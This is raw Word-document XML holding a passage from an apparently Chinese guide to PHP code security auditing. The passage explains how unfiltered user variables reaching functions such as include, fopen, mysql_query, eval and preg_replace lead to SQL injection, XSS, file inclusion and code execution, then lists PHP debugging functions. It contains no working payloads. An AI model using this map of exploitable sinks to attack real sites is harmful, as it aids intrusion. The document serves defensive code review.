    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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安全问题所在：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从代码级别上，也就是应用层次上考虑代码安全的话（也就是不</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="17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考虑底层的语言本身等问题的漏洞），脚本安全问题就是函数和变量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的问题。变量直接或者间接的接收用户不安全的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入，由于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本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身的特性，在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中更容易发现这种变量的混乱（很多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程序都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用来定义以及初始化以及接收变量，可以直接在程序中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">$id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这样的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变量，初始化完全由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的设置来完成，如果稍不注意，就可能导致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变量的混乱从而导致攻击）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="279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变量接收不安全的输入之后，没有做恰当的过滤又用在不同的地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方，就可能造成不同的危害。如果直接进入数据库然后显示给用户就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会导致</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>跨站脚本</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击，如果用在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> sql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>语句中就可能导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注射攻击，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这几种攻击都是</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>与具体的脚本语言无关的，在各种脚本语言里都可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能存在。由于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的变量很灵活，这些有害的变量如果用在一些逻辑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语句中，就会导致关键代码的跳过如身份验证失败和跳过一些变量的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初始化从而导致程序逻辑混乱而产生其他漏洞。如果这个变量用在了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危险的函数如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>等等当中，当然就会出现文件包含漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>洞，出现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在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> fopen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数里就会可能产生写文件的漏洞，出现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto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56"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lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql_query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>函数中就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>注射漏洞，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">eval </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18"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及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> preg_replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中可能导致代码的执行，出现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> htmlspecia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>函数中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可能导致出错而绝对路径泄露</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">...... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>变量出现的环境决定了它可能的危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害。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342" w:lineRule="exact"/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总结为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以控制的变量【一切输入都是有害的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】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="464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2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变量到达有利用价值的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>危险函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>【一切进入函数的变量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是有害的】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317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思考了问题的存在，那么如何从代码级别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上检查这种漏洞呢？当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然熟悉熟悉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语言是最基本的，也应该是抓住函数和变量，危险的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函数里如果有变量那么</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请确定</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个变量的来源，是否正确的初始化，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初始化之后是否能被用户注入敏感字符，在进入函数前这些敏感的字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符是否</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>得到了彻底的清除。对于代码审核工作的难点可能</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就在于对变</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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量来源的确定，这需要对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特性以及你所审核的代码的熟悉，但也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并不是所有的变量的来源都清晰可见，可能一些初始化的代码并没有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像想象中运行，一些变量里的东西可能也来自于你并不想他来的地方，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还有一些变量可能来自于数据库或者系统的配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件，但是很可能数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据库和</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>配置文件在之前就已经被修改，或者在后面不安全的操作了这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些变量，这些变量也是不可相信的。本文档就按照变量与函数的思路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来思考脚本代码的安全。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto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9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b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="需要了解一些函数"/>
      <w:bookmarkStart w:id="4" w:name="_bookmark1"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要了解一些函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>常用输出函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="776"/>
        </w:tabs>
        <w:ind w:right="2601" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输出一个字符串或变量，但是不能输出数组。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pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="776"/>
        </w:tabs>
        <w:ind w:right="5330" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>print_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>r(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>输出一个数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="776"/>
        </w:tabs>
        <w:ind w:right="1130" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">var_dump() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输出一个变量的结构，这个变量包含普通变量，数组，对象等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8"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="12"/>
          <w:lang w:eastAsia="zh-CN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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、获取当前进程所有变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>常量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="13"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="776"/>
        </w:tabs>
        <w:ind w:right="312" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">get_defined_vars(void) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此函数返回一个包含当前可用的变量列表的多维数组，这些变量包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>环境变量、服务器变量和用户定义的变量。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在函数中使用此函数可以调试函数中的变量，而不会返回其他的变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="776"/>
        </w:tabs>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:right="501" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">$GLOBALS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此函数返回所有的全局变量，当然函数中定义的变量不是全局变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="776"/>
        </w:tabs>
        <w:ind w:right="1291" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>get_defined_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>functions(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">void) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>获取所有已经定义的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>包含内部函数和用户定义的函数。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>输出用户定义的函数方法为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343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$hhh=get_defined_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>functions(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>);var_dump($hhh['user']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="776"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="775"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
